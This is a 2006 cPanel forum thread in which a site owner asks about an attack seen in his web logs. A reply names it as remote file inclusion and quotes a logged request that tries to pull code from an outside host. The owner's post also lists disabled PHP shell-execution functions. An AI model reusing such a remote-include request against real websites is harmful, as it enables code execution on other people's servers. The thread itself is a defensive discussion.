Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

check log i what is that hacking method

Discussion in 'General Discussion' started by kuwaitnt, Nov 25, 2006.

  1. kuwaitnt

    kuwaitnt Well-Known Member

    Joined:
    Oct 13, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    156
    hello

    i have strange hacking on my box

    http://3zz.cc/iplog2.txt

    that is log from my web site

    it is on shared server with centos 4.4
    iam run vbulletin last version

    and server is well secure but i don't know what is this hacking method

    can any one help us to prevent is


    i know the hacker is get help.txt file from his web site

    but i don't know where does he put thats file i have check my web site there are no suspension file i check the log i don't know also the name does he request to hack my web site

    i think he can delete, read and change files and folders for my web site and i think he also can control my website from other web site on that server



    notice :

    iam use php4.4.4 with safe_mode and this disable_functions

    phpinfo, mkdir, unlink, symlink, ini_restore, popen, pclose, system, exec, shell_exec, suExec, dl, passthru, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, posix_getpwuid, escapeshellcmd, escapeshellarg, fpassthru, psockopen, cmd, backtick, virtual, pcntl_exec , ini_alter, parse_ini_file, show_source, apache_child_terminate, apache_get_modules , apache_get_version , apache_note, openlog, popens, filegetcontents, get_dir, dos_conv, myshellexec, get_current_user, php_uname, fileperms, filegroup, fileowner, getmyuid, getmygid

    i have set allow_url_fopen to off

    and php run with phpsuexec


    i have installed mod_security with accunett rules or others rules i have add it

    i have install rfx network LES

    my system is centos 4.4 with cpanel current version



    i know the person who try to hack me and i know he is get files to my website or other web site on my server then he try hacking
     
  2. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    655
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Canada
    Looks like a common attack on register_globals using a remote include.
    Check your web.php file at the includet variable. It's probably not properly coded.

    Sat Nov 25 16:21:16 2006 1 91.140.140.49 6038 /home/nokia3/pub62.150.187.89 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://www.arabdesing.com/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. kuwaitnt

    kuwaitnt Well-Known Member

    Joined:
    Oct 13, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    156
    root@dnsbox [/tmp]# php -i | grep global
    register_globals => Off => Off



    it is off on that server

    but iam unanderstand what is that


    /home/nokia3/public_html/includes/init.php a _ i r nokia3 ftp 1 * c


    there are some thing i think about chown or chmod files or some ftp issue ?


    i realy unknow what he is try to do :(

    as server is realy well secure but iam unanderstand what does he do
     
  4. kuwaitnt

    kuwaitnt Well-Known Member

    Joined:
    Oct 13, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    156
    hello

    for notice : i have set register_globals off and allow_url_fopen to off

    when iam checking on domlog files i have notice

    he have upload files via web in the past he upload encoded file in cgi-bin folder

    and i need to know what is his method to hack my web sites !! so that i can prevent it

    i think i will made mod_security rules for that request a _ i r nokia3 ftp 1 * c

    but what about user name to how can i made it ??
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice